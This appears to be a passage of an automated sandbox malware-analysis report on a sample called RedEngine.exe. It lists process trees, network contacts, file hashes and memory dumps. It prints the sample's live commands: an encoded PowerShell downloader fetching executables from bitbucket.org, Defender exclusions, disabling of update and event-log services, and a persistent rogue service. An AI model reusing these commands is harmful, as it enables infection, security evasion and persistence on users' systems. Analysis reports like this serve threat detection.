AAcABEAGEAdABhACAAPAAjAHMAbQBmACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGwAaQBjAC4AZQB4AGUAJwApACkAPAAjAHQAZgB2ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAaQB0AGIAdQBjAGsAZQB0AC4AbwByAGcALwBkAGEAZwBlAHcAaAAvAHQAZQBzAHQANgAzADQAMgA1AC8AcgBhAHcALwAzADAAMAA1AGQAZAAyAGQANQA3ADMANwA5ADgAMwAxADIANAAzADAAMQBhAGQAOAA2ADQAMgA3ADgAZgBmADUAMwAzAGMAYwA5ADcAMQBhAC8ATABlAHYAaQBhAHQAaABhAG4ALgBlAHgAZQAnACwAIAA8ACMAagBkAGIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBhAHYAdgAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBhAGIAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBsAGkAYwBjAGgAZQBjAGsALgBlAHgAZQAnACkAKQA8ACMAdQBjAGEAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAYgB1AGMAawBlAHQALgBvAHIAZwAvAGQAYQBnAGUAdwBoAC8AdABlAHMAdAA2ADMANAAyADUALwByAGEAdwAvADMAMAAwADUAZABkADIAZAA1ADcAMwA3ADkAOAAzADEAMgA0ADMAMAAxAGEAZAA4ADYANAAyADcAOABmAGYANQAzADMAYwBjADkANwAxAGEALwBMAGUAdgBpAHQAZQBuAC4AZQB4AGUAJwAsACAAPAAjAGcAeQB6ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAbABwAHgAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAaAB0AGIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATABpAGMARwBlAHQALgBlAHgAZQAnACkAKQA8ACMAdwBrAHIAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZABnAGMAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGsAZABuACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGwAaQBjAC4AZQB4AGUAJwApADwAIwBpAGcAcgAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB4AHoAYwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdQB6AGMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbABpAGMAYwBoAGUAYwBrAC4AZQB4AGUAJwApADwAIwBoAHAAaQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB3AHEAbAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAbABpAHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATABpAGMARwBlAHQALgBlAHgAZQAnACkAPAAjAGsAcwBrACMAPgA="

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#ufh#>[System.Windows.Forms.MessageBox]::Show('No license! Connect your Steam account in order to get a license. Make sure that you are not using alternative account, otherwise license will not be given. (This is done to prevent cracking)','','OK','Warning')<#zqe#>;

C:\Users\Admin\AppData\Roaming\lic.exe

"C:\Users\Admin\AppData\Roaming\lic.exe"

C:\Users\Admin\AppData\Roaming\liccheck.exe

"C:\Users\Admin\AppData\Roaming\liccheck.exe"

C:\Users\Admin\AppData\Roaming\LicGet.exe

"C:\Users\Admin\AppData\Roaming\LicGet.exe"

C:\Windows\SysWOW64\dialer.exe

"C:\Windows\system32\dialer.exe"

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "FJIEXRSL"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "FJIEXRSL" binpath= "C:\ProgramData\mwvfjadyvgps\ebvoxlrooljj.exe" start= "auto"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "FJIEXRSL"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\lic.exe"

C:\ProgramData\mwvfjadyvgps\ebvoxlrooljj.exe

C:\ProgramData\mwvfjadyvgps\ebvoxlrooljj.exe

C:\Windows\system32\choice.exe

choice /C Y /N /D Y /T 3

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\sihost.exe

sihost.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 98.56.20.217.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
GB 23.44.234.16:80 tcp
US 8.8.8.8:53 bitbucket.org udp
AU 104.192.141.1:443 bitbucket.org tcp
US 8.8.8.8:53 1.141.192.104.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 150.1.37.23.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 204.201.50.20.in-addr.arpa udp

Files

memory/2740-1-0x0000000074CB0000-0x0000000075460000-memory.dmp

memory/2740-0-0x0000000002B50000-0x0000000002B86000-memory.dmp

memory/2740-2-0x0000000004CE0000-0x0000000004CF0000-memory.dmp

memory/2740-3-0x0000000004CE0000-0x0000000004CF0000-memory.dmp

memory/2740-4-0x0000000005320000-0x0000000005948000-memory.dmp

memory/2740-5-0x0000000005270000-0x0000000005292000-memory.dmp

memory/2740-6-0x0000000005A50000-0x0000000005AB6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_z11oyfbm.ldr.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2740-12-0x0000000005B30000-0x0000000005B96000-memory.dmp

memory/2740-17-0x0000000005CA0000-0x0000000005FF4000-memory.dmp

memory/2740-18-0x0000000006140000-0x000000000615E000-memory.dmp

memory/2740-19-0x00000000061E0000-0x000000000622C000-memory.dmp

memory/2740-20-0x0000000007300000-0x0000000007396000-memory.dmp

memory/2740-21-0x0000000006660000-0x000000000667A000-memory.dmp

memory/2740-22-0x00000000066B0000-0x00000000066D2000-memory.dmp

memory/2740-23-0x0000000007950000-0x0000000007EF4000-memory.dmp

memory/2740-24-0x000000007F910000-0x000000007F920000-memory.dmp

memory/2740-26-0x0000000070AD0000-0x0000000070B1C000-memory.dmp

memory/2740-25-0x0000000007670000-0x00000000076A2000-memory.dmp

memory/3076-36-0x0000000074CB0000-0x0000000075460000-memory.dmp

memory/2740-37-0x0000000007650000-0x000000000766E000-memory.dmp

memory/3076-38-0x0000000002710000-0x0000000002720000-memory.dmp

memory/3076-39-0x0000000002710000-0x0000000002720000-memory.dmp

memory/2740-40-0x00000000076B0000-0x0000000007753000-memory.dmp

memory/2740-41-0x0000000004CE0000-0x0000000004CF0000-memory.dmp

memory/2740-51-0x0000000008580000-0x0000000008BFA000-memory.dmp

memory/2740-52-0x0000000007850000-0x000000000785A000-memory.dmp

memory/2740-53-0x00000000078A0000-0x00000000078B1000-memory.dmp

memory/2740-54-0x00000000078D0000-0x00000000078DE000-memory.dmp

memory/3076-55-0x00000000072E0000-0x0000000007372000-memory.dmp

memory/2740-56-0x00000000078E0000-0x00000000078F4000-memory.dmp

memory/2740-57-0x0000000007920000-0x000000000793A000-memory.dmp

memory/2740-58-0x0000000007910000-0x0000000007918000-memory.dmp

C:\Users\Admin\AppData\Roaming\lic.exe

MD5 87f351e454deded1b279aef5a5d632e9
SHA1 a936b08d94983f58a31f1207d73fd640fcbabd1a
SHA256 5543ea3c67eb8e9bb763a54e80a042dfa7b297d62610e7fe057d0fc7be49212c
SHA512 3c40874adc3ea30d147b68ba74aadb0b0228a822137dd0db04daa611a6ecc8ee8e0bfc49fb7242dee60bc2fa6860575f4061c7ff8aa9e4105550c710316f2b8f

C:\Users\Admin\AppData\Roaming\liccheck.exe

MD5 091267b13791fb80a21044c473e74298
SHA1 7a4240532744ccb36fbd15f179dd0799b73de881
SHA256 7ff6d4737f39fefefa9fc6d1f3dc31fcc968d0d45bb09a364457a0af51af860f
SHA512 e69a6d7309bd73a365f088918c7cae13a8b0925f5b395e38c9cd51509d5b451694a660143f5be4d24624b51f4a4a6a1c2c0fac0a650a539386a81e4eaa7e71c2

C:\Users\Admin\AppData\Roaming\LicGet.exe

MD5 d505d50ab745d07a7c9cba97717febe4
SHA1 528d34e656da344a33a5e3fe27ac43ad5f7dfd0a
SHA256 87fad0da502598adcb3da26c2a260cefcec7f383d73b62f94d7c8175812c0fad
SHA512 28a8975b6133c366cdcde075acbec07ce7be6fa7a98387dabe5d5c5024368ac9663705d668b1c48f4da6ae8b0f6b95798ac1e4abada6a5a885d431467c8febf1

memory/2040-86-0x0000000000B30000-0x0000000000B9D000-memory.dmp

memory/2740-91-0x0000000074CB0000-0x0000000075460000-memory.dmp

memory/2040-94-0x0000000003450000-0x0000000003850000-memory.dmp

memory/2040-95-0x0000000003450000-0x0000000003850000-memory.dmp

memory/2040-96-0x0000000003450000-0x0000000003850000-memory.dmp

memory/2040-98-0x0000000003450000-0x0000000003850000-memory.dmp

memory/2040-97-0x00007FFA49DB0000-0x00007FFA49FA5000-memory.dmp

memory/2040-100-0x00000000774A0000-0x00000000776B5000-memory.dmp

memory/3988-101-0x0000000000900000-0x0000000000909000-memory.dmp

memory/2040-102-0x0000000000B30000-0x0000000000B9D000-memory.dmp

memory/3988-105-0x0000000002540000-0x0000000002940000-memory.dmp

memory/3988-106-0x00007FFA49DB0000-0x00007FFA49FA5000-memory.dmp

memory/3988-108-0x0000000002540000-0x0000000002940000-memory.dmp

memory/3988-109-0x00000000774A0000-0x00000000776B5000-memory.dmp

memory/3988-110-0x0000000002540000-0x0000000002940000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5efb49cec0db02811b5a377cd2518d69
SHA1 d2d8deebaa583fae9f6be1267c1062ce385aab86
SHA256 6dafee793a1899a409a908ab669a4075d8d58d0870dfc1d02db47b822b74a1b9
SHA512 8a4e89709cd338411e025a558ce9eb02efd1936152209ea8d934214ccaae5eff112e42759b6d696e5d62d4951b1f872470541835149d51c3a43a4b7d14279c14

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 33943ddf7ab410f98e2bff392ed62441
SHA1 f27016ff8b33cb2b8df39364d0ae2bf8a2c00e52
SHA256 186b4f81ac762e8bda66248fd38ce38190d108b5c430293f64c1dcef5ff32b65
SHA512 918d18568c816149d1dd848e1a5bfba9f3e84c9e4e23d4e4982c05cf9366ceac265ba82333aa2a917d2374fd6eb62877f28a92b226baee03918d8608af2d7ede

memory/3076-114-0x0000000074CB0000-0x0000000075460000-memory.dmp

memory/3144-116-0x000001B446220000-0x000001B446242000-memory.dmp

memory/3144-125-0x00007FFA2AD20000-0x00007FFA2B7E1000-memory.dmp

memory/3144-129-0x00007FFA2AD20000-0x00007FFA2B7E1000-memory.dmp

memory/1448-130-0x0000000140000000-0x000000014002B000-memory.dmp

memory/1448-131-0x0000000140000000-0x000000014002B000-memory.dmp

memory/1448-132-0x0000000140000000-0x000000014002B000-memory.dmp

memory/1448-133-0x0000000140000000-0x000000014002B000-memory.dmp

memory/1448-135-0x0000000140000000-0x000000014002B000-memory.dmp

memory/1448-137-0x00007FFA49C10000-0x00007FFA49CCE000-memory.dmp

memory/1448-136-0x00007FFA49DB0000-0x00007FFA49FA5000-memory.dmp

memory/1448-141-0x0000000140000000-0x000000014002B000-memory.dmp

memory/616-144-0x0000016117170000-0x0000016117194000-memory.dmp

memory/616-145-0x00000161171A0000-0x00000161171CB000-memory.dmp

memory/668-151-0x00007FFA09E30000-0x00007FFA09E40000-memory.dmp

memory/668-148-0x00000211F2440000-0x00000211F246B000-memory.dmp

memory/616-147-0x00000161171A0000-0x00000161171CB000-memory.dmp

memory/616-150-0x00007FFA49E4D000-0x00007FFA49E4E000-memory.dmp

memory/668-154-0x00000211F2440000-0x00000211F246B000-memory.dmp

memory/668-158-0x00007FFA49E4D000-0x00007FFA49E4E000-memory.dmp

memory/948-155-0x000001B622840000-0x000001B62286B000-memory.dmp

memory/64-156-0x000001E9AD940000-0x000001E9AD96B000-memory.dmp

memory/948-159-0x00007FFA09E30000-0x00007FFA09E40000-memory.dmp

memory/668-161-0x00007FFA49E4C000-0x00007FFA49E4D000-memory.dmp

memory/512-163-0x000001375F690000-0x000001375F6BB000-memory.dmp

memory/428-167-0x000001EF00600000-0x000001EF0062B000-memory.dmp

memory/668-165-0x00007FFA49E4F000-0x00007FFA49E50000-memory.dmp

memory/948-169-0x000001B622840000-0x000001B62286B000-memory.dmp

memory/512-166-0x00007FFA09E30000-0x00007FFA09E40000-memory.dmp

memory/428-170-0x00007FFA09E30000-0x00007FFA09E40000-memory.dmp

memory/1032-172-0x000001AE584D0000-0x000001AE584FB000-memory.dmp

memory/64-177-0x00007FFA49E4F000-0x00007FFA49E50000-memory.dmp

memory/1032-176-0x00007FFA09E30000-0x00007FFA09E40000-memory.dmp

memory/64-173-0x000001E9AD940000-0x000001E9AD96B000-memory.dmp

memory/512-179-0x000001375F690000-0x000001375F6BB000-memory.dmp

memory/1060-175-0x0000022209340000-0x000002220936B000-memory.dmp

memory/1060-178-0x00007FFA09E30000-0x00007FFA09E40000-memory.dmp

memory/4476-182-0x00007FFA2AD20000-0x00007FFA2B7E1000-memory.dmp

memory/4476-184-0x00000192743D0000-0x00000192743E0000-memory.dmp

memory/4476-183-0x00000192743D0000-0x00000192743E0000-memory.dmp

memory/1032-186-0x000001AE584D0000-0x000001AE584FB000-memory.dmp

memory/428-185-0x000001EF00600000-0x000001EF0062B000-memory.dmp

memory/1060-187-0x0000022209340000-0x000002220936B000-memory.dmp

memory/1068-190-0x000002632F1B0000-0x000002632F1DB000-memory.dmp

memory/1068-192-0x000002632F1B0000-0x000002632F1DB000-memory.dmp

memory/1184-197-0x0000022F5E360000-0x0000022F5E38B000-memory.dmp

memory/1156-196-0x000001E5EBB60000-0x000001E5EBB8B000-memory.dmp

memory/1156-199-0x00007FFA09E30000-0x00007FFA09E40000-memory.dmp

memory/1184-198-0x00007FFA09E30000-0x00007FFA09E40000-memory.dmp

memory/1068-191-0x00007FFA09E30000-0x00007FFA09E40000-memory.dmp

memory/1304-201-0x0000026CA29A0000-0x0000026CA29CB000-memory.dmp

memory/1304-204-0x00007FFA09E30000-0x00007FFA09E40000-memory.dmp

memory/616-210-0x00000161171A0000-0x00000161171CB000-memory.dmp

memory/1312-212-0x000001B20B170000-0x000001B20B19B000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-05 17:02

Reported

2024-04-05 17:05

Platform

win7-20240221-en

Max time kernel

119s

Max time network

121s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RedEngine.exe"

Signatures

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A bitbucket.org N/A N/A
N/A bitbucket.org N/A N/A
N/A bitbucket.org N/A N/A
N/A bitbucket.org N/A N/A
N/A bitbucket.org N/A N/A
N/A bitbucket.org N/A N/A
N/A bitbucket.org N/A N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\RedEngine.exe

"C:\Users\Admin\AppData\Local\Temp\RedEngine.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHkAeQBkACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHUAZgBoACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcATgBvACAAbABpAGMAZQBuAHMAZQAhACAAQwBvAG4AbgBlAGMAdAAgAHkAbwB1AHIAIABTAHQAZQBhAG0AIABhAGMAYwBvAHUAbgB0ACAAaQBuACAAbwByAGQAZQByACAAdABvACAAZwBlAHQAIABhACAAbABpAGMAZQBuAHMAZQAuACAATQBhAGsAZQAgAHMAdQByAGUAIAB0AGgAYQB0ACAAeQBvAHUAIABhAHIAZQAgAG4AbwB0ACAAdQBzAGkAbgBnACAAYQBsAHQAZQByAG4AYQB0AGkAdgBlACAAYQBjAGMAbwB1AG4AdAAsACAAbwB0AGgAZQByAHcAaQBzAGUAIABsAGkAYwBlAG4AcwBlACAAdwBpAGwAbAAgAG4AbwB0ACAAYgBlACAAZwBpAHYAZQBuAC4AIAAoAFQAaABpAHMAIABpAHMAIABkAG8AbgBlACAAdABvACAAcAByAGUAdgBlAG4AdAAgAGMAcgBhAGMAawBpAG4AZwApACcALAAnACcALAAnAE8ASwAnACwAJwBXAGEAcgBuAGkAbgBnACcAKQA8ACMAegBxAGUAIwA+ADsAIgA7ADwAIwBsAGIAcgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGgAYwBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAcABnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAcwBpACMAPgA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAGkAdABiAHUAYwBrAGUAdAAuAG8AcgBnAC8AZABhAGcAZQB3AGgALwB0AGUAcwB0ADYAMwA0ADIANQAvAHIAYQB3AC8AMwAwADAANQBkAGQAMgBkADUANwAzADcAOQA4ADMAMQAyADQAMwAwADEAYQBkADgANgA0ADIANwA4AGYAZgA1ADMAMwBjAGMAOQA3ADEAYQAvAEwAZQB2AGkAUAByAG8AdAAuAGUAeABlACcALAAgADwAIwB6AHEAbQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGkAagBmACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHMAbQBmACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGwAaQBjAC4AZQB4AGUAJwApACkAPAAjAHQAZgB2ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAaQB0AGIAdQBjAGsAZQB0AC4AbwByAGcALwBkAGEAZwBlAHcAaAAvAHQAZQBzAHQANgAzADQAMgA1AC8AcgBhAHcALwAzADAAMAA1AGQAZAAyAGQANQA3ADMANwA5ADgAMwAxADIANAAzADAAMQBhAGQAOAA2ADQAMgA3ADgAZgBmADUAMwAzAGMAYwA5ADcAMQBhAC8ATABlAHYAaQBhAHQAaABhAG4ALgBlAHgAZQAnACwAIAA8ACMAagBkAGIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBhAHYAdgAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBhAGIAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBsAGkAYwBjAGgAZQBjAGsALgBlAHgAZQAnACkAKQA8ACMAdQBjAGEAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAYgB1AGMAawBlAHQALgBvAHIAZwAvAGQAYQBnAGUAdwBoAC8AdABlAHMAdAA2ADMANAAyADUALwByAGEAdwAvADMAMAAwADUAZABkADIAZAA1ADcAMwA3ADkAOAAzADEAMgA0ADMAMAAxAGEAZAA4ADYANAAyADcAOABmAGYANQAzADMAYwBjADkANwAxAGEALwBMAGUAdgBpAHQAZQBuAC4AZQB4AGUAJwAsACAAPAAjAGcAeQB6ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAbABwAHgAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAaAB0AGIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATABpAGMARwBlAHQALgBlAHgAZQAnACkAKQA8ACMAdwBrAHIAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZABnAGMAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGsAZABuACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGwAaQBjAC4AZQB4AGUAJwApADwAIwBpAGcAcgAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB4AHoAYwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdQB6AGMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbABpAGMAYwBoAGUAYwBrAC4AZQB4AGUAJwApADwAIwBoAHAAaQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB3AHEAbAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAbABpAHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATABpAGMARwBlAHQALgBlAHgAZQAnACkAPAAjAGsAcwBrACMAPgA="

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#ufh#>[System.Windows.Forms.MessageBox]::Show('No license! Connect your Steam account in order to get a license. Make sure that you are not using alternative account, otherwise license will not be given. (This is done to prevent cracking)','','OK','Warning')<#zqe#>;

Network

Country Destination Domain Proto
US 8.8.8.8:53 bitbucket.org udp
AU 104.192.141.1:443 bitbucket.org tcp
AU 104.192.141.1:443 bitbucket.org tcp
AU 104.192.141.1:443 bitbucket.org tcp
AU 104.192.141.1:443 bitbucket.org tcp
AU 104.192.141.1:443 bitbucket.org tcp
AU 104.192.141.1:443 bitbucket.org tcp

Files

memory/2480-2-0x0000000074150000-0x00000000746FB000-memory.dmp

memory/2480-3-0x0000000074150000-0x00000000746FB000-memory.dmp

memory/2480-4-0x0000000002D30000-0x0000000002D70000-memory.dmp

memory/2480-5-0x0000000002D30000-0x0000000002D70000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 e18bf9ef2d4bf0df46948f1d0b19ca29
SHA1 d988a382466ea3032b44afe993e3286cbd002d9d
SHA256 c52577eb0a2778b929476ed2f6f60e1be466050a32c0bf1b7a93bffa8dcff4e4
SHA512 f12d7dbed9802a9a47c75c453fffb265c8d8c514395cec45b41c93adc26d6c09f0bdd4ea99e31bd397875251987ff78bfa4e548602bfeae231e1a6572ac39695

memory/2740-11-0x0000000074150000-0x00000000746FB000-memory.dmp

memory/2740-12-0x0000000074150000-0x00000000746FB000-memory.dmp

memory/2740-13-0x0000000074150000-0x00000000746FB000-memory.dmp

memory/2480-14-0x0000000074150000-0x00000000746FB000-memory.dmp